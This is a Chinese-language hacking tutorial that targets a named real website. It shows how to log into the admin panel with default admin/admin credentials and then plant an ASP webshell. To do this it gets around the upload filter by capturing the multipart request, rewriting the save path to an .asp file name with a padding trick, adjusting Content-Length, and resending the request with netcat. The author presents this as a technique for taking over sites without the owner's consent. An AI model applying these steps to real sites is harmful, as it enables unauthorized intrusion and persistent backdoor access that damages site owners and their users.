大家好, 我是天使之翼, 今天给大家带来一个教程,我N久没做教程了,呵,今天带来一个吧,其实这个教程没啥技术含量,高手就闪,呵,只是多给大家一个思路,拿站的时侯可能用到,呵~
　　好了,不多说了, 今天要拿的站是http://www.laorenyongpin.com/这个,
　　后台http://www.laorenyongpin.com/admin/login.asp
　　这个主站上面,没扫到什么注入的漏洞,只是这个管理员太大意了
　　密码没有改,这个的用户和密码都是admin
　　大家自己进去看了~现在来看一下后台~没备份数据库~
　　在看别的,看有没有ewebeditor之类的漏洞
　　"../eWebEditor280/ewebeditor.asp?
　　有一个,不过这个密码改了,不过要是没改也没用,他的上传删了,~
　　上传页删了,不过这个不是我今天讲的,来看一下下面的
　　我们点添加产品,主要用到的是这个~,呵,有上传
　　不过这个限制了,改源代码也不可以用,呵,不信你看~
　　http://www.laorenyongpin.com/admin/UpFileForm.asp?Result=SmallPic
　　不可以上传, 要是新手遇到这个问题相信大多都是放弃了,~,呵,
　　这个也是有方法可以破的,就是用nc上传,用nc上传就要用到抓包改包了
　　我就不打字了,大家自己看,好了,就这些,就是抓到的包,现在来改包
　　主要改两个地方,一个是目录,一个就是大小
　　Content-Disposition: form-data; name="SaveToPath"
　　Upload/PicFiles/
　　-----------------------------7d82fd106b03ec
　　Content-Disposition: form-data; name="Submit"
　　Host: www.laorenyongpin.com
　　Content-Length: 2056
　　Upload/PicFiles/xm.asp 这个ASP后记得加一个空格在算一下加了几个字符
　　7个,就是在
　　Content-Length: 2063基础上在加7
　　好,保存,在改包,用c32改,找到我们加的那个地方xm.asp
　　好了,保存一下,现在就用nc提交一下就可以了
　　nc www.laorenyongpin.com 80 < 1.txt
　　这个就行了,现在就是找我们小马的地址~
　　这个就是了~
　　看这个就是了,~好了,教程就到这里吧~
　　我的QQ:1581901~